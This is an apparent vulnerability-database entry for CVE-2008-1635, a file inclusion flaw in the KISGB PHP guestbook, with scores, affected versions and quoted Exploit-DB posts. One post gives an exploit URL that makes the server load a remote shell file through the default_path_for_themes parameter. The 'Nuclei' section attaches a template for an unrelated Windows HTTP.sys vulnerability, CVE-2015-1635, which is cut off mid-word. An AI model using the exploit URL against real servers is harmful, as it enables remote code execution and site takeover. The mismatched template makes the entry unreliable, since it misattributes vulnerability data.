CVE-2008-1635
Published 2008-04-02
Priority P341 · high · CVSS 2.0 score 7.5
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 2.99% (85.6th percentile)
Directory traversal vulnerability in view_private.php in Keep It Simple Guest Book (KISGB) 5.0.0 and earlier allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the tmp_theme parameter. NOTE: 5.1.1 is also reportedly affected.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| raven_php_scripts | keep_it_simple_guest_book | <= 5.1.1 | — |
No detection rules found.
Exploit-DB
KISGB (tmp_theme) 5.1.1 - Local File Inclusion
exploitdb·2008-03-30
---
[~] KISGB (Keep It Simple Guest Book) : Local FiLe Include's (tmp_theme)
[~]
[~] Version : All Versions
[~]
[~] Download : http://sourceforge.net/project/showfiles.php?group_id=38585
[~] ----------------------------------------------------------
[~] Exploit coded and founded by Cr@zy_King
[~]
[~] Date: 30.03.2008
[~]
[~]
[~] -----------------------------------------------------------
[~] Greetz tO:-
[~]
[~] Digital-AngeLs Bug Researchers Yakinda OnLine :) Loading.
[~]
[~] [Peace Crew] Kerem125 - Alemin_Krali - m0sted - UyussMan
[~]
[~] Eno7 | Crackers_Child | Ghost61 | str0ke | [Hx] | [03xTr] | The_Bekir
[~]----------------------------------------------------------------------
[~] Exploit :-
[~]
[~] http:
Exploit-DB
KISGB 5.1.1 - 'Authenticate.php' Remote File Inclusion
exploitdb·2006-12-22
---
*KISGB (Keep It Simple Guest Book)* [default_path_for_themes] ******************* Remote File Include*
+class : Remote File Include Vulnerability*
+******************************************************************************************************************
+download link : http://phpnuke-downloads.com/modules.php?name=Downloads&d_op=ns_getit&cid=14&lid=156&type=url#get*
+Author : mdx
*
+Files : *
+authenticate.php? *
+code : *
+ *
+if (isset($default_path_for_themes)) require("$default_path_for_themes/$theme");*
+ *
+ Exploit : *
+********************************************************************************************+
+ http://www.site.***/[path]/authenticate.php?default_path_for_themes=http://mdxshell.txt? +
+++++++++
Nuclei
Microsoft Windows 'HTTP.sys' - Remote Code Execution
nuclei·CVSS 9.8
HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
Template:
id: CVE-2015-1635
info:
  name: Microsoft Windows 'HTTP.sys' - Remote Code Execution
  author: Phillipo
  severity: critical
  description: |
    HTTP.sys in Microsoft Windows 7 SP1, Windows Server 2008 R2 SP1, Windows 8, Windows 8.1, and Windows Server 2012 Gold and R2 allows remote attackers to execute arbitrary code via crafted HTTP requests, aka "HTTP.sys Remote Code Execution Vulnerability."
  impact: |
    Attackers can execute arbitrary code remotely on Windows servers running vulnerab
No writeups or analysis indexed.